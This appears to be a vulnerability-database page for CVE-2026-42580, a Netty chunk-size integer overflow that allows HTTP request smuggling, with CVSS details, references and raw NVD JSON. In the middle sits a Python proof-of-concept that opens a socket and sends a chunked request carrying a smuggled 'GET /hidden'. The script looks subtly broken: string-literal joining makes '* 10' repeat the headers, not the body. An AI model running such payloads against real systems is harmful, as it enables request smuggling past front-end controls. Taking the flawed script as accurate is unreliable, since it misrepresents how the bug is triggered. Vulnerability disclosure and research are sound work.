CVE-2026-42580

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Netty < 4.2.13.Final

Netty < 4.1.133.Final

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

def exploit_netty_smuggling(host, port):
    # PoC for CVE-2026-42580: Netty Chunk Size Overflow leading to Request Smuggling
    # This script sends a chunked request with a size that triggers an integer overflow.
    
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "80000000\r\n"  # Large value to cause int overflow in 32-bit signed int
        "A" * 10 + "\r\n"
        "0\r\n"
        "\r\n"
        # Second request smuggled within the same connection
        "GET /hidden HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload.encode())
        print(f"Payload sent to {host}:{port}")
        # Receive response to verify behavior
        response = s.recv(4096)
        print("Response:")
        print(response.decode())
        s.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    exploit_netty_smuggling("127.0.0.1", 8080)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42580
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42580
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42580/
[4] VulDB https://vuldb.com/cve/CVE-2026-42580
[5] https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723
[6] https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42580", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.490", "lastModified": "2026-05-14T19:16:35.967", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}